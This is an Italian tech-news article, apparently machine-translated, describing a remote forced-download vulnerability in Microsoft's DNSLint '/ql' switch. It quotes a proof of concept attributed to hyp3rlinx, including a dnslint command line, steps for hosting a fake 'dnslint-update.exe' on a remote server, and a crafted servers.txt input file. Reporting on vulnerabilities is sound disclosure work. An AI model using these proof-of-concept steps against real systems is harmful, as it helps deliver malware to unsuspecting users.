Logo it.nowadaytechnol.com

Lo Switch QL Dell'utilità DNSLint Di Microsoft Potrebbe Consentire Il Download Di File Remoti

Lo Switch QL Dell'utilità DNSLint Di Microsoft Potrebbe Consentire Il Download Di File Remoti
Lo Switch QL Dell'utilità DNSLint Di Microsoft Potrebbe Consentire Il Download Di File Remoti

Video: Lo Switch QL Dell'utilità DNSLint Di Microsoft Potrebbe Consentire Il Download Di File Remoti

Video: Lo Switch QL Dell'utilità DNSLint Di Microsoft Potrebbe Consentire Il Download Di File Remoti
Video: How to Install active directory with DNS on windows server 2016 2024, Marzo
Anonim
Image
Image

L'utilità Microsoft DNSLint funziona per diagnosticare i problemi di ricerca del nome DNS (Domain Name System) relativi agli indirizzi IP assegnati a diversi server Web a cui si accede tramite il browser. Non è incluso come parte del pacchetto di base di Windows ma può essere scaricato gratuitamente dal sito Web di Microsoft. È stato scoperto che la vulnerabilità di accesso remoto di grado 7.6 (critico) sulla scala CVSS 3.0 influisce su questa utilità, provocando l'azionamento forzato dei download.

La vulnerabilità deriva dal fatto che DNSLint non esamina i nomi di dominio durante l'analisi dei file di test DNS secondo lo switch "/ ql". Nel caso in cui un utente finale riesca a utilizzare tale file che contiene script o codice binario in contrasto con le informazioni sul nome di dominio tipicamente previste, il sistema potrebbe essere messo a rischio laddove diventa facile istituire download forzati. Nel caso in cui ciò si verifichi, l'hacker potrebbe spingere per il download forzato di file dannosi che potrebbero scaricare ed eseguire comandi remoti quando si accede tramite il browser web. Il download verrebbe salvato nella posizione del sistema locale e richiederebbe l'accesso di sicurezza e, visto che il file proviene da una posizione nota sull'unità disco, l'utente potrebbe essere incline a consentire il proseguimento dell'eseguibile. Una volta concesso il privilegio al file dannoso, potrebbe eseguire qualsiasi codice previsto in remoto e compromettere la sicurezza e la privacy dell'utente.

John Page di hyp3rlinx ha scritto una prova di concetto che simula questa vulnerabilità, spiegando che un file non intenzionale potrebbe essere scaricato come segue quando viene utilizzato uno script o un file di testo di riferimento binario anziché il nome di dominio:

dnslint.exe / v / y / d "FILE-MALWARE" / s X. X. X. X / r "myreport"

Nel contesto dell'utilità DNSLint, quanto segue mostra come è possibile sfruttare la vulnerabilità per introdurre malware nel sistema.

1) "dnslint-update.exe" nella directory root del server Web remoto. 2) "servers.txt" DNSLint; Questo è un file di input DNSLint di esempio + Questo server DNS si chiama: dns1.cp.msft.net [dns ~ server] X. X. X. X, a, r; record X. X. X. X, ptr, r; record PTR test1, cname, r; record CNAME test2, mx, r; record MX 3) dnslint.exe / ql servers.tx

Il codice sopra non è stato modificato come delineato dai diritti di hyp3rlinx su questo contenuto. Rivelando questa vulnerabilità, non sembra che ci sia ancora alcun aggiornamento di patch per risolvere questo problema. Il codice CVE deve ancora essere assegnato a questa vulnerabilità e deve essere identificato e scritto da Microsoft nel suo bollettino ufficiale sulla sicurezza in merito.

Consigliato: